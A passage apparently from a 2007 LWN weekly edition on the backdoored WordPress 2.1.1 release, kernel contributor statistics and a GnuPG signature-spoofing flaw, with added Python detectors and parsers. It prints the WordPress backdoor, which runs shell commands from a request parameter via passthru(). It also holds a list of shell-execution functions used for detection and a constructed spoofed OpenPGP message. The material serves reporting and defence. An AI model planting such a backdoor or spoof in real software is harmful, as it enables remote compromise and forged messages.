The backdooring of WordPress
WordPress is, according to its web site, "a state-of-the-art semantic
personal publishing platform with a focus on aesthetics, web standards, and
usability." In other words, it is yet another weblog platform written in
PHP. Like many such platforms, it has a fairly long history of security
issues. Even so, the code samples featured in this ifsecure advisory are on
the extreme side. One example:
// Helper that hands its argument straight to the shell.
function get_theme_mcommand($mcds) {
passthru($mcds);
}
/* ... */
// Any request carrying ?iz=<command> runs that command as the web server user.
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
Needless to say, code like this is not a programming error - it is a
deliberate backdoor. The project responded quickly, replacing the
compromised 2.1.1 release with a fixed 2.1.2 and sending out an
advisory. Even so, there are probably sites which installed the 2.1.1
release (which appears to have been distributed with the backdoor for about
one week) and which are still vulnerable.
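A check an administrator who installed 2.1.1 would want is a scan of the installed tree for the shape of code quoted above: a shell-execution function, or a small wrapper around one, fed straight from a request parameter. The following Python is an added example, not code from the advisory or from WordPress. The function and parameter names in the embedded sample are the ones quoted above; the rest of the sample, the list of sink functions and the wrapper detection are this example's own assumptions, and the match is a textual heuristic, not proof that a tree is clean.

```python
import os
import re

SHELL_FUNCS = ("passthru", "system", "exec", "shell_exec", "popen", "proc_open")
SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["
FUNC_DEF = re.compile(r"\bfunction\s+(\w+)\s*\(([^)]*)\)\s*\{")


def _body(src, brace):
    """Text between the '{' at src[brace] and its matching '}' (plain brace
    counting; braces inside strings or comments would confuse it)."""
    depth = 0
    for i in range(brace, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[brace + 1:i]
    return src[brace + 1:]


def shell_wrappers(src):
    """Names of functions that pass one of their own parameters to a shell
    execution function, the way get_theme_mcommand() above wraps passthru()."""
    names = set()
    for m in FUNC_DEF.finditer(src):
        body = _body(src, m.end() - 1)
        for param in re.findall(r"\$\w+", m.group(2)):
            sink = r"\b(?:%s)\s*\(\s*%s\b" % ("|".join(SHELL_FUNCS), re.escape(param))
            if re.search(sink, body):
                names.add(m.group(1))
    return names


def find_backdoor_calls(src):
    """Call sites where a shell function, or a wrapper around one, receives a
    request parameter directly. Returns [(function name, line number)]."""
    sinks = sorted(set(SHELL_FUNCS) | shell_wrappers(src))
    call = re.compile(r"\b(%s)\s*\(\s*%s" % ("|".join(map(re.escape, sinks)), SUPERGLOBAL))
    return [(m.group(1), src.count("\n", 0, m.start()) + 1) for m in call.finditer(src)]


def scan_tree(root):
    """Walk an installed tree; return {relative path: hits} for files that match."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_backdoor_calls(fh.read())
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report


# Constructed samples: the fragment quoted above, and a harmless lookup that
# also takes a request parameter but never reaches a shell.
BACKDOORED = """<?php
function get_theme_mcommand($mcds) {
passthru($mcds);
}
/* ... */
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
"""
CLEAN = """<?php
function get_theme($name) { return 'themes/' . basename($name); }
echo get_theme($_GET["t"]);
"""

if __name__ == "__main__":
    print(find_backdoor_calls(BACKDOORED))   # [('get_theme_mcommand', 6)]
    print(find_backdoor_calls(CLEAN))        # []
```

On a real install, scan_tree("/var/www/wordpress") lists every file with a hit and the line to inspect; an empty report only says this particular pattern is absent, which is why checksums of known-good releases would have been the better tool.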
It would be nice if the project would make a little more information
available. As others have noted, there are no checksums of good or
compromised versions of the software. We also know nothing about how the
code was compromised in the first place, beyond this:
It was determined that a cracker had gained user-level access to
one of the servers that powers wordpress.org, and had used that
access to modify the download file.
Inquiring minds want to know how this could have come about; is there a
separate WordPress vulnerability which still needs to be fixed? What steps
have been taken to ensure that this sort of security breach cannot happen
to future WordPress releases? The insertion of backdoors into services
which are directly exposed to the Internet is a scary business; anybody who
is running WordPress should be asking the project some serious questions to
convince themselves that they will not have to go through this again. Your
editor searched in vain for any such discussion in the WordPress forums.
In one sense, WordPress users can consider themselves lucky: the code
implementing the backdoor was so crude that it had little chance of
escaping detection for long. Had the backdoor code been more subtle, it
could well have survived for much longer. One assumes that the WordPress
developers are auditing their code, looking for holes inserted with more
care. But if they are, they are not talking about it.
In general, backdoors are a frightening prospect for free software
developers to ponder. The relatively open nature of many projects must
provide a tempting target for scheming crackers, and it is not that hard to
imagine that a good-enough developer could manage to code a backdoor in a
sufficiently obscure manner that it gets through the review process without
being detected. There may well be a project distributing such code now.
That said, a quick look at the (relatively thin) history of compromised
free software distributions shows that the normal contribution process is
not the preferred way to insert backdoors. Instead, crackers seem to focus
on breaking into servers and modifying code there. We can count ourselves
fortunate; such attacks are easier to detect and recover from.
The real lesson from this episode, as from the ones that came before, is
that there is a real incentive for crackers to insert malware into free
software distributions. (Clearly, the same incentive exists for
proprietary software, but that does not concern us here). Any project
which is distributing code with any security considerations at all (and
that is most code) needs to think about this threat. If your processes -
or your servers - are vulnerable to attack, it may be your project which
finds its way into the headlines for the wrong reasons.
Who's writing 2.6.21 and related issues
Our article Who wrote 2.6.20?, which appeared two weeks ago, generated a
strong response. There is, it seems, a lot of interest in where this code is
coming from, but nobody had gotten around to doing the crunching to figure
it out. That article calls for a followup in a few ways.
First, those who saw the article early on may want to take another look, as
some of the tables have been changed. There was only one serious mistake
to fix - one developer's affiliation was incorrectly guessed by the code -
but further information has also helped to shrink the "unknown" column
somewhat. The original tables can be found from the article (for whatever
historical reasons may exist), but the tables in the article itself are the
current ones.
The 2.6.21 cycle has moved far enough along as of this writing (the
2.6.21-rc3 prepatch is due any time) that it's worth taking a look
at the statistics for the just over 4,000 changesets which have been
merged. There are some familiar names here, but some new ones as well.
These reflect the different nature of this development cycle: 2.6.21 will
have fewer changes in the virtualization area, for example, but it has some
significant core changes (like the clockevents and dynamic tick
work). A somewhat different set of developers had work ready to merge this
time around, and the results show that.
Anyway, the developers with the most work merged this time around are:
| Most active 2.6.21 developers |
| By changesets |
| Eric W. Biederman | 104 | 2.5% |
| Ralf Baechle | 77 | 1.9% |
| Adrian Bunk | 71 | 1.7% |
| Bob Moore | 66 | 1.6% |
| Andrew Morton | 54 | 1.3% |
| Takashi Iwai | 54 | 1.3% |
| Robert P. J. Day | 53 | 1.3% |
| Jeff Dike | 52 | 1.3% |
| Jiri Slaby | 51 | 1.2% |
| Ben Dooks | 50 | 1.2% |
| Tejun Heo | 48 | 1.2% |
| Al Viro | 48 | 1.2% |
| David Brownell | 47 | 1.1% |
| YOSHIFUJI Hideaki | 44 | 1.1% |
| Mike Isely | 43 | 1.1% |
| Thomas Gleixner | 38 | 0.9% |
| Randy Dunlap | 38 | 0.9% |
| Stephen Hemminger | 36 | 0.9% |
| Alan Cox | 35 | 0.9% |
| Michael Krufky | 32 | 0.8% |
| By lines changed |
| Adrian Bunk | 24097 | 6.1% |
| Divy Le Ray | 18255 | 4.6% |
| Ben Dooks | 17510 | 4.4% |
| Andrew Victor | 13877 | 3.5% |
| Ralf Baechle | 9905 | 2.5% |
| YOSHIFUJI Hideaki | 9505 | 2.4% |
| Steve Wise | 9418 | 2.4% |
| Jeff Garzik | 7014 | 1.8% |
| Vitaly Bordug | 6387 | 1.6% |
| Thomas Gleixner | 6078 | 1.5% |
| Bob Moore | 6055 | 1.5% |
| Ishizaki Kou | 5912 | 1.5% |
| Richard Purdie | 5909 | 1.5% |
| Liam Girdwood | 5773 | 1.5% |
| Frank Mandarino | 5284 | 1.3% |
| Jay Cliburn | 5182 | 1.3% |
| Tejun Heo | 5120 | 1.3% |
| Kumar Gala | 5044 | 1.3% |
| Martin Schwidefsky | 4729 | 1.2% |
| Olof Johansson | 4659 | 1.2% |
On the side of removing code, the list of names remains about the same:
| Developers with the most lines removed |
| Adrian Bunk | 23720 | 12.8% |
| Jeff Garzik | 6808 | 3.7% |
| Paul Mundt | 2442 | 1.3% |
| Bob Moore | 1526 | 0.8% |
| Len Brown | 1244 | 0.7% |
| Alexey Starikovskiy | 987 | 0.5% |
| Jiri Slaby | 954 | 0.5% |
| Kenji Kaneshige | 661 | 0.4% |
| Eric Sandeen | 609 | 0.3% |
| Tim Schmielau | 547 | 0.3% |
Adrian Bunk continues to remove code from the kernel at an amazing rate.
Also about the same is the table of signoffs:
| Developers with the most signoffs (total 8614) |
| Andrew Morton | 1000 | 11.6% |
| Linus Torvalds | 865 | 10.0% |
| Jeff Garzik | 346 | 4.0% |
| Jaroslav Kysela | 224 | 2.6% |
| Greg Kroah-Hartman | 224 | 2.6% |
| David Miller | 208 | 2.4% |
| Mauro Carvalho Chehab | 206 | 2.4% |
| Len Brown | 202 | 2.3% |
| Takashi Iwai | 187 | 2.2% |
| Ralf Baechle | 156 | 1.8% |
| Russell King | 153 | 1.8% |
| Paul Mackerras | 151 | 1.8% |
| James Bottomley | 114 | 1.3% |
| Eric W. Biederman | 105 | 1.2% |
| Adrian Bunk | 99 | 1.1% |
| Andi Kleen | 94 | 1.1% |
| Alexey Starikovskiy | 82 | 1.0% |
| Kyle McMartin | 79 | 0.9% |
| David Brownell | 78 | 0.9% |
| Ingo Molnar | 68 | 0.8% |
The list of developers contributing code to a given kernel release can
change over time, but the people through whom those patches pass - the
subsystem maintainers - remain about the same. These developers form the
infrastructure which does the work of getting reviewed code into the
mainline kernel.
Here are the by-employer tables for 2.6.21-rc:
| Top contributors by employer |
| By changesets |
| (Unknown) | 1108 | 27.1% |
| (None) | 380 | 9.3% |
| Red Hat | 304 | 7.4% |
| Intel | 280 | 6.8% |
| IBM | 259 | 6.3% |
| Novell | 258 | 6.3% |
| Linux Foundation | 159 | 3.9% |
| Linux Networx | 104 | 2.5% |
| (Consultant) | 100 | 2.4% |
| Oracle | 89 | 2.2% |
| MIPS Technologies | 77 | 1.9% |
| Google | 61 | 1.5% |
| MontaVista | 55 | 1.3% |
| SGI | 54 | 1.3% |
| Simtec | 50 | 1.2% |
| Nokia | 41 | 1.0% |
| TimeSys | 38 | 0.9% |
| Sony | 36 | 0.9% |
| HP | 35 | 0.9% |
| Toshiba | 34 | 0.8% |
| By lines changed |
| (Unknown) | 85436 | 21.5% |
| (None) | 52312 | 13.2% |
| IBM | 28186 | 7.1% |
| Intel | 20778 | 5.2% |
| Red Hat | 19007 | 4.8% |
| Novell | 18702 | 4.7% |
| Chelsio | 18361 | 4.6% |
| Simtec | 17545 | 4.4% |
| SANPeople | 13949 | 3.5% |
| MIPS Technologies | 12646 | 3.2% |
| Open Grid Computing | 9442 | 2.4% |
| MontaVista | 8861 | 2.2% |
| Toshiba | 7462 | 1.9% |
| Wolfson Microelectronics | 7379 | 1.9% |
| Sony | 7061 | 1.8% |
| Freescale | 6993 | 1.8% |
| TimeSys | 6184 | 1.6% |
| Endrelia | 5421 | 1.4% |
| Nokia | 4790 | 1.2% |
| Renesas Technology | 4740 | 1.2% |
Many of the names are the same, but Red Hat does not dominate to quite the
same extent as in 2.6.20. The percentage of patches contributed by
developers known to be working on their own time has increased slightly.
Finally, some commenters on the original article requested the release of
the code used to generate the numbers. Your editor has some qualms about
doing so. The biggest among them is not that the code is an
embarrassing hack with, presumably, at least one bug still in it. Neither
is it the fact that the code could be seen as a competitive tool for LWN;
frankly, there's nothing that complicated there.
The biggest worry is related to the attention these numbers drew, and the
fact that a couple of developers have mailed in to note that they have
received job offers as a result of appearing in the LWN lists. In
addition, a few employers have contacted us to be sure that their
"account" is credited with the work of all of their employees. The
numbers your editor has generated are approximations, but some people
clearly see them as being important.
The editors
at LWN have an interest in covering the free software community while
minimizing the changes that such coverage might cause - most of the time,
at least. It seems plausible that, if the "top 20 contributors list" is
seen as a desirable place
to appear - with positive career benefits - developers might change their
behavior as a result. It would be a shame to start seeing kernel patches
aimed mainly at increasing a developer's count of lines changed. Such
patches, one assumes, would not fare well in the review process, but it
would be better if the situation did not come up at all.
The issue of the mapping between developers and their employers is also
worth some consideration. Some of that information was obtained directly
from the developers with a promise not to disclose it further; that promise
must be kept. Beyond that, developers tend to change employers over time,
and the code is not currently smart enough to deal with that. This
shortcoming is not a problem when looking at a single release cycle, but it
clearly would be an issue for multi-year analysis. The code could be
improved, but it's not at all clear that the maintenance and distribution of a
database of kernel developers' work histories is something LWN wants to get
into. There are serious privacy issues to consider.
Despite these worries, the code is being released. In the end, it's not as
if somebody else would have all that much trouble reproducing it. Some of
the employer information has been taken out in response to the concerns outlined
above, though. A tarball of the initial release can be found here;
your editor is looking forward to the flood of patches which will improve
the system.
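To make concrete what the tables above count, and what the developer-to-employer mapping discussed here involves, the following Python is an added example; it is neither LWN's statistics code nor the tarball mentioned above. It parses the default git log --numstat output and tallies changesets, lines changed (taken here as lines added plus lines removed, which matches the Adrian Bunk row above), lines removed and Signed-off-by lines; the commit log and the e-mail-domain-to-employer table are constructed for the example, and real runs need per-developer overrides for the reasons the article gives.

```python
import re
from collections import Counter

AUTHOR = re.compile(r"^Author:\s*(.+?)\s*<([^>]+)>\s*$")
SIGNOFF = re.compile(r"^\s*Signed-off-by:\s*(.+?)\s*<[^>]+>\s*$")
NUMSTAT = re.compile(r"^(\d+|-)\t(\d+|-)\t.+$")   # added, removed, path; '-' for binary

# Constructed employer table keyed by e-mail domain (an assumption for this
# example). Anything unmapped lands in "(Unknown)", as in the tables above.
DOMAINS = {"redhat.com": "Red Hat", "intel.com": "Intel", "ibm.com": "IBM"}


def parse_log(text):
    """Turn `git log --numstat` output into one dict per commit."""
    commits, cur = [], None
    for line in text.splitlines():
        if line.startswith("commit "):
            cur = {"author": None, "email": None, "signoffs": [], "added": 0, "removed": 0}
            commits.append(cur)
            continue
        if cur is None:
            continue
        m = AUTHOR.match(line)
        if m:
            cur["author"], cur["email"] = m.group(1), m.group(2)
            continue
        m = SIGNOFF.match(line)
        if m:
            cur["signoffs"].append(m.group(1))
            continue
        m = NUMSTAT.match(line)
        if m and m.group(1) != "-":          # skip binary files
            cur["added"] += int(m.group(1))
            cur["removed"] += int(m.group(2))
    return commits


def tally(commits):
    """The counters behind the tables: changesets, lines changed (added +
    removed), lines removed, and Signed-off-by lines, per person."""
    changesets, changed, removed, signoffs = Counter(), Counter(), Counter(), Counter()
    for c in commits:
        changesets[c["author"]] += 1
        changed[c["author"]] += c["added"] + c["removed"]
        removed[c["author"]] += c["removed"]
        for name in c["signoffs"]:
            signoffs[name] += 1
    return changesets, changed, removed, signoffs


def by_employer(commits):
    """Changesets per employer, mapped from the author's e-mail domain."""
    out = Counter()
    for c in commits:
        domain = c["email"].rsplit("@", 1)[-1].lower()
        out[DOMAINS.get(domain, "(Unknown)")] += 1
    return out


def table(counter, n=20):
    """Rows of (name, count, percent of total), largest first."""
    total = sum(counter.values())
    return [(name, count, round(100.0 * count / total, 1))
            for name, count in counter.most_common(n)]


# Constructed log in the shape of `git log --numstat`; three commits, two authors.
SAMPLE_LOG = """\
commit 1111111111111111111111111111111111111111
Author: Alice Example <alice@redhat.com>
Date:   Tue Mar 6 10:00:00 2007 -0700

    net: drop dead helper

    Signed-off-by: Alice Example <alice@redhat.com>
    Signed-off-by: Maintainer One <m1@example.org>
    Signed-off-by: Top Level <top@example.org>

5\t120\tnet/core/dead.c
2\t0\tnet/core/Makefile

commit 2222222222222222222222222222222222222222
Author: Bob Example <bob@intel.com>
Date:   Tue Mar 6 11:00:00 2007 -0700

    driver: add foo support

    Signed-off-by: Bob Example <bob@intel.com>
    Signed-off-by: Top Level <top@example.org>

300\t10\tdrivers/foo/foo.c
-\t-\tdrivers/foo/firmware.bin

commit 3333333333333333333333333333333333333333
Author: Alice Example <alice@redhat.com>
Date:   Tue Mar 6 12:00:00 2007 -0700

    net: fix typo

    Signed-off-by: Alice Example <alice@redhat.com>
    Signed-off-by: Top Level <top@example.org>

1\t1\tnet/core/dev.c
"""

if __name__ == "__main__":
    commits = parse_log(SAMPLE_LOG)
    for title, counter in zip(("changesets", "lines changed", "lines removed", "signoffs"),
                              tally(commits)):
        print(title, table(counter))
    print("by employer", table(by_employer(commits)))
```

The sign-off table is the one that changes least from release to release for the reason the article gives: a maintainer signs every patch that passes through, so the counts measure the tree's funnel rather than anyone's output.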
Page editor: Jonathan Corbet
Security
GnuPG signed message spoofing vulnerability
March 7, 2007
This article was contributed by Jake Edge.
An advisory about a problem
in GNU Privacy Guard (GnuPG) would normally cause worries about an
implementation flaw leading to insecurely encrypted data. Thankfully, this
particular vulnerability does not fall into that category and data encrypted
using GnuPG is not at risk from it; it is, instead, a hole which allows
attackers to spoof signatures.
This vulnerability highlights an interesting
interaction between GnuPG and the applications that use it. The flaw is not
so much in how GnuPG does its work, rather it is in how it presents it.
GnuPG is an implementation of the OpenPGP standard which governs messages
encrypted with public-key encryption. The standard is described in RFC 2440
and is descended from the original Pretty Good Privacy (PGP) program that
Phil Zimmermann released (much to the chagrin of the US Government) in 1991.
Many different mail programs use GnuPG (or the related GnuPG Made Easy
(GPGME) library) to handle encrypted email; these programs include most open
source email clients (KMail, Evolution, Thunderbird via the EnigMail plugin,
mutt, etc.). All are vulnerable to the spoof - as is the gpg command-line
tool, depending on how it is used.
One of the features of OpenPGP is digital signing of
messages so that the recipient can ensure that the message they
receive is the same as the one that was sent. It is this digital
signature that is vulnerable to this attack as it can be spoofed; making it
appear that unsigned text is covered by a valid signature. An attacker
can insert malicious text into an existing message and have it appear
to have been sent by the signer.
OpenPGP messages consist of a set of "packets" that correspond to different
sections of a message (plaintext, encrypted, signature, compressed,
ascii-armored, etc). Taking two valid OpenPGP messages and concatenating
them produces a longer, but still valid, OpenPGP message. The simplest
way to exploit the flaw is to take a plaintext packet and add it to the
front of a signed plaintext packet. If the user attempts to verify
the message by invoking gpg < msgfile, they will see the contents
of both of the plaintext packets followed by a statement that the
signature was verified. Nothing in the output indicates the presence of
two packets with different signature status.
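What gpg sees in that case is only a sequence of packets. The following Python is an added example, not GnuPG's or the advisory's code: it walks the packet headers of a binary OpenPGP message (RFC 2440 old- and new-format length encodings, descending into ZIP/ZLIB compressed packets) and records, for each literal data packet, whether it lies between a one-pass signature packet and its signature packet. The sample messages are constructed, with a placeholder signature body, since the flaw concerns packet layout rather than signature mathematics; the older layout that puts the signature packet before the data is not modelled.

```python
import struct
import zlib

TAG_SIGNATURE, TAG_ONEPASS, TAG_COMPRESSED, TAG_LITERAL = 2, 4, 8, 11


def iter_packets(data):
    """Yield (tag, body) for every packet in an OpenPGP binary message.

    Handles RFC 2440 old-format and new-format headers (including new-format
    partial body lengths) and descends into ZIP/ZLIB compressed packets."""
    i, n = 0, len(data)
    while i < n:
        ctb = data[i]
        if not ctb & 0x80:
            raise ValueError("offset %d: not a packet header" % i)
        i += 1
        if ctb & 0x40:                                  # new-format header
            tag, body = ctb & 0x3F, bytearray()
            while True:                                 # one or more body chunks
                first, partial = data[i], False
                i += 1
                if first < 192:
                    length = first
                elif first < 224:
                    length = ((first - 192) << 8) + data[i] + 192
                    i += 1
                elif first == 255:
                    length = struct.unpack(">I", data[i:i + 4])[0]
                    i += 4
                else:                                   # partial chunk of 2^(first & 0x1f)
                    length, partial = 1 << (first & 0x1F), True
                body += data[i:i + length]
                i += length
                if not partial:
                    break
            body = bytes(body)
        else:                                           # old-format header
            tag, ltype = (ctb >> 2) & 0x0F, ctb & 0x03
            if ltype == 3:                              # indeterminate: rest of input
                body, i = data[i:], n
            else:
                size = (1, 2, 4)[ltype]
                length = int.from_bytes(data[i:i + size], "big")
                i += size
                body = data[i:i + length]
                i += length
        if i > n:
            raise ValueError("truncated packet")
        if tag == TAG_COMPRESSED:
            algo, inner = body[0], body[1:]
            if algo == 1:
                inner = zlib.decompress(inner, -15)     # ZIP: raw deflate
            elif algo == 2:
                inner = zlib.decompress(inner)          # ZLIB
            else:
                raise ValueError("unsupported compression algorithm %d" % algo)
            yield from iter_packets(inner)
        else:
            yield tag, body


def plaintext_segments(data):
    """Return [(covered, text)] per literal data packet, in message order.

    covered is True only when the packet sits between a one-pass signature
    packet and its signature packet (the layout GnuPG emits). Signatures are
    located, not verified."""
    depth, out = 0, []
    for tag, body in iter_packets(data):
        if tag == TAG_ONEPASS:
            depth += 1
        elif tag == TAG_SIGNATURE:
            depth = max(depth - 1, 0)
        elif tag == TAG_LITERAL:
            name_len = body[1]
            out.append((depth > 0, body[2 + name_len + 4:]))   # skip format, name, date
    return out


def is_spoofable(data):
    """True when showing the whole output as one signed text would mislead:
    more than one literal packet, or a literal packet outside any signature."""
    segments = plaintext_segments(data)
    return len(segments) != 1 or not segments[0][0]


def packet(tag, body):
    """Old-format header (tag < 16) with the smallest length field that fits."""
    for ltype, size in ((0, 1), (1, 2), (2, 4)):
        if len(body) < 1 << (8 * size):
            return bytes([0x80 | (tag << 2) | ltype]) + len(body).to_bytes(size, "big") + body
    raise ValueError("body too large")


def literal(text, name=b"msg.txt"):
    """Literal data packet: format 'b', filename, zero timestamp, then data."""
    return packet(TAG_LITERAL, b"b" + bytes([len(name)]) + name + b"\0\0\0\0" + text)


# Constructed samples. The one-pass packet is v3/binary/SHA-1/DSA with a dummy
# key id; the signature body is a placeholder, as only packet layout matters here.
ONEPASS = packet(TAG_ONEPASS, bytes([3, 0x00, 2, 17]) + b"\x11" * 8 + b"\x01")
SIG = packet(TAG_SIGNATURE, b"\x03" + b"\x00" * 18)
SIGNED = ONEPASS + literal(b"Meet at noon.\n") + SIG
SPOOFED = literal(b"Wire the money to Mallory first.\n") + SIGNED
COMPRESSED_SIGNED = packet(TAG_COMPRESSED, b"\x02" + zlib.compress(SIGNED))

if __name__ == "__main__":
    for label, msg in (("signed", SIGNED), ("spoofed", SPOOFED)):
        print(label, "spoofable" if is_spoofable(msg) else "ok", plaintext_segments(msg))
```

Run stand-alone, the spoofed message yields two segments, the first uncovered, which is exactly the distinction that a plain gpg < msgfile run flattens away when it prints both texts followed by one "Good signature" line.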
If this were the only issue, there would be a relatively easy, but not
completely satisfying, workaround; do not redirect stdin from a
file when using gpg. When
it is invoked as gpg msgfile, GnuPG writes each individual plaintext
packet into a separate file and, depending on the filenames specified in
the packet, the above example would either create two
files or prompt asking whether to overwrite when it encounters
the second packet. That prompt, or the presence of two files, might be
enough to alert the observant user to an anomaly, but is hardly foolproof.
Unfortunately, mail clients typically invoke gpg via the output
end of a pipe which allows them to be spoofed.
GnuPG does provide the --status-fd mode to prevent just this kind of
attack by producing more status information on the specified file descriptor.
The status information is not particularly user-friendly and might not
alert a casual user to the spoof, but it certainly can be used by a program
to detect the spoof. This is how GnuPG recommends that it be used by other
programs but the developers of many mail clients ignored that advice with
the result that their code is vulnerable.
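How a program can act on that status output, as an added example that is neither GPGME's nor any mail client's code: the lines follow the "[GNUPG:] KEYWORD ..." format GnuPG documents for --status-fd, the sample logs below are constructed and abbreviated, and the decision rule (two PLAINTEXT lines mean two concatenated messages, so the output must not be presented as a single signed text) is this example's own.

```python
import subprocess

GOOD_KEYWORDS = {"GOODSIG"}
BAD_KEYWORDS = {"BADSIG", "ERRSIG", "EXPSIG", "EXPKEYSIG", "REVKEYSIG", "NO_PUBKEY"}


def assess_status(status_text):
    """Classify one gpg run from its --status-fd lines.

    Returns (verdict, plaintext_count, good_signatures). Output may be shown
    as 'signed' only if exactly one PLAINTEXT line appeared (one literal data
    packet) alongside at least one GOODSIG and no failed signature. Two or
    more PLAINTEXT lines mean concatenated messages: the spoof above."""
    plaintexts = good = bad = 0
    for line in status_text.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0] != "[GNUPG:]":
            continue                          # log noise sharing the descriptor
        keyword = parts[1]
        if keyword == "PLAINTEXT":
            plaintexts += 1
        elif keyword in GOOD_KEYWORDS:
            good += 1
        elif keyword in BAD_KEYWORDS:
            bad += 1
    if plaintexts == 0:
        verdict = "no-plaintext"
    elif plaintexts > 1:
        verdict = "spoofed"
    elif bad:
        verdict = "bad-signature"
    elif good == 0:
        verdict = "unsigned"
    else:
        verdict = "signed"
    return verdict, plaintexts, good


def verify_with_gpg(message, gpg="gpg"):
    """Run gpg the way a client should: plaintext on stdout, status on its
    own descriptor (fd 2 here, filtered by prefix), verdict taken from the
    status lines only. Needs a gpg binary, so the samples below do not call it."""
    proc = subprocess.run(
        [gpg, "--batch", "--no-tty", "--status-fd", "2", "--output", "-", "--decrypt"],
        input=message, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    verdict, _, _ = assess_status(proc.stderr.decode("utf-8", "replace"))
    return verdict, proc.stdout


# Constructed, abbreviated status logs: timestamps, key ids and user ids are
# made up, and VALIDSIG and related lines are omitted.
GOOD_STATUS = """\
[GNUPG:] PLAINTEXT 62 1173200000 msg.txt
[GNUPG:] PLAINTEXT_LENGTH 14
[GNUPG:] SIG_ID x1Yq9Zz2 2007-03-06 1173200000
[GNUPG:] GOODSIG 0123456789ABCDEF Alice <alice@example.org>
[GNUPG:] TRUST_ULTIMATE
"""

SPOOFED_STATUS = """\
[GNUPG:] PLAINTEXT 62 1173200000 injected.txt
[GNUPG:] PLAINTEXT_LENGTH 33
[GNUPG:] PLAINTEXT 62 1173200000 msg.txt
[GNUPG:] PLAINTEXT_LENGTH 14
[GNUPG:] SIG_ID x1Yq9Zz2 2007-03-06 1173200000
[GNUPG:] GOODSIG 0123456789ABCDEF Alice <alice@example.org>
[GNUPG:] TRUST_ULTIMATE
"""

UNSIGNED_STATUS = """\
[GNUPG:] PLAINTEXT 62 1173200000 note.txt
[GNUPG:] PLAINTEXT_LENGTH 5
"""

if __name__ == "__main__":
    for name, log in (("good", GOOD_STATUS), ("spoofed", SPOOFED_STATUS)):
        print(name, assess_status(log))
```

Using fd 2 for status means it shares stderr with human-readable diagnostics, hence the prefix filter; a dedicated pipe handed to gpg via pass_fds keeps the two apart. Either way the verdict has to come from these lines, since the plaintext on stdout carries no marker of where one packet ends and the next begins.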
Normally this might be considered a problem for the mail
client developers to solve, but the GnuPG team decided to make changes to
GnuPG and GPGME to alleviate the problem.
Updated versions of GnuPG will no longer process multiple messages in a
single invocation, avoiding the mingling of packets with
different signature status. GPGME has been changed to avoid the spoofing
even when it is using a vulnerable version of GnuPG. It is likely that the
various mail clients will need to be updated eventually as well because
they may well rely on GnuPG to process multiple messages in a single pass.
The mail clients may not correctly process all of the email types that they
did in the past, but they will not be vulnerable to this kind of attack.
The advisory has a wealth of information about the flaw and various ways that
it can be exploited; it is well worth a read for those interested. This is
an interesting bug because it lives between the GnuPG software and its
users (both human and program). The GnuPG developers could have pushed this
off as a problem for those users, but took a more helpful approach. If the
command-line version (gpg < msgfile) of the flaw did not exist,
it seems possible that they would have chosen differently and the mail client
development teams would instead be scrambling to release updates.
Security news
The Month of PHP Bugs
The Month of PHP Bugs (March) has been announced. "This initiative is an
effort to improve the security of PHP. However we will not concentrate on
problems in the PHP language that might result in insecure PHP applications,
but on security vulnerabilities in the PHP core. During March 2007 old and
new security vulnerabilities in the Zend Engine, the PHP core and the PHP
extensions will be disclosed on a day by day basis. We will also point out
necessary changes in the current vulnerability manag[e]ment process used by
the PHP Security Response Team."
New vulnerabilities
GnuPG: unsigned data injection vulnerability
Package(s): gnupg
CVE #(s): CVE-2007-1263
Created: March 6, 2007
Updated: March 30, 2007
Description: Core Security Technologies has reported that GnuPG and GnuPG
clients are vulnerable to an unsigned data injection vulnerability.
mod_jk: stack overflow
Package(s): mod_jk
CVE #(s): CVE-2007-0774
Created: March 5, 2007
Updated: May 30, 2007
Description: A stack overflow flaw was found in the URI handler of mod_jk. A
remote attacker could visit a carefully crafted URL being handled by mod_jk
and trigger this flaw, which could lead to the execution of arbitrary code
as the 'apache' user.
mod_python: information disclosure
Package(s): libapache2-mod-python
CVE #(s): CVE-2004-2680
Created: March 7, 2007
Updated: March 8, 2007
Description: From the Ubuntu advisory: Miles Egan discovered that mod_python,
when used in output filter mode, did not handle output larger than 16384
bytes, and would display freed memory, possibly disclosing private data.
snort: remote arbitrary code execution
Package(s): snort
CVE #(s): CVE-2006-5276
Created: March 2, 2007
Updated: September 7, 2007
Description: The Snort intrusion detection system is vulnerable to a buffer
overflow in the DCE/RPC preprocessor code. Remote attackers can send
specially crafted fragmented SMB or DCE/RPC packets which can be used to
allow the remote execution of arbitrary code.
STLport: buffer overflows
Package(s): STLport
CVE #(s): CVE-2007-0803
Created: March 7, 2007
Updated: March 7, 2007
Description: STLport (prior to version 5.0.3) suffers from two remotely
exploitable buffer overflows.
tcpdump: denial of service
Package(s): tcpdump
CVE #(s): CVE-2007-1218
Created: March 5, 2007
Updated: November 15, 2007
Description: Off-by-one buffer overflow in the parse_elements function in the
802.11 printer code (print-802_11.c) for tcpdump 3.9.5 and earlier allows
remote attackers to cause a denial of service (crash) via a crafted 802.11
frame. NOTE: this was originally referred to as heap-based, but it might be
stack-based.
util-linux: information disclosure
Package(s): util-linux
CVE #(s): CVE-2007-0822
Created: March 7, 2007
Updated: March 7, 2007
Description: Users can confuse util-linux by way of removable drives, leading
to crashes and the possibility of information disclosure via the resulting
core dumps.
wordpress: cross-site scripting
Package(s): wordpress
CVE #(s): CVE-2007-1049
Created: March 5, 2007
Updated: March 21, 2007
Description: A cross-site scripting (XSS) vulnerability in the
wp_explain_nonce function in the nonce AYS functionality
(wp-includes/functions.php) for WordPress 2.0 before 2.0.9 and 2.1 before
2.1.1 allows remote attackers to inject arbitrary web script or HTML via the
file parameter to wp-admin/templates.php, and possibly other vectors
involving the action variable.
Updated vulnerabilities
apache: cross-site scripting
Package(s): apache
CVE #(s): CVE-2006-3918
Created: August 9, 2006
Updated: April 4, 2008
Description: From the Red Hat advisory: "A bug was found in Apache where an
invalid Expect header sent to the server was returned to the user in an
unescaped error message. This could allow an attacker to perform a
cross-site scripting attack if a victim was tricked into connecting to a
site and sending a carefully crafted Expect header."
bind: denial of service
Package(s): bind
